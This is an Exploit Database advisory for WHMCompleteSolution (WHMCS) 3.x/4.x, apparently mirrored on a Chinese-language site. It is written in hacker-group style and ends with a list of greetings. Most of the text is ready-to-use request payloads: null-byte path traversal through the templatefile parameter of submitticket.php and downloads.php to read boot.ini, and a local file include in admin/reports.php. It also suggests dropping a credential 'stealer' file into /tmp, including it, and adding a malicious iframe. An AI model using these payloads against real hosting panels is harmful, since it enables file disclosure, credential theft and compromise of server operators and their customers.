WHMCompleteSolution 3.x/4.x – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： ZxH-Labs
  日期： 2011-11-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18088/

• $b0x#WHMCS ( WHMCompleteSolution )3.x / 4.xMultiple Vulnerability !
  $b0x#ZxH-Labs
  $b0x#1st-NOV-11
  $b0x#Www.Sec4ever.coM 
  $b0x#WH-03 On Windows IIS 6.0
  
  ========================================================
  b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
  ZxH-Labs | Www.Sec4ever.coM
  b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL
  
  EXPL Type : Local File Disclosure
  
  Files : Submitticket.php , Downloads.php
  
   -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
   EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00
  
   ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
  EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00
  
  
  b0x@1337b0x:/b0x/Exploits/WebAPP#
  b0x@1337b0x:/b0x/Exploits/WebAPP#cat WH-03.bug
  
  Bug TYPE : Local File Include
  Bug File : Reports.php
  
   -I : reports.php?report=[LFI]%00
  EX : admin/reports.php?report=../../../../../../../boot.ini%00
   
   You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
  However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
  And Don't Forget To Use IFRAME With Evil Code'z =))
  
  
  b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
  ========================================================
  $b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |TNT_HACKER | r1z | Tw1st3r | S4S
  Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN| Th3MMA | FreeMan(LY) | Ma3stro_DZ
  Mr.L4iv3And All Q8'z 
  
  ./b0x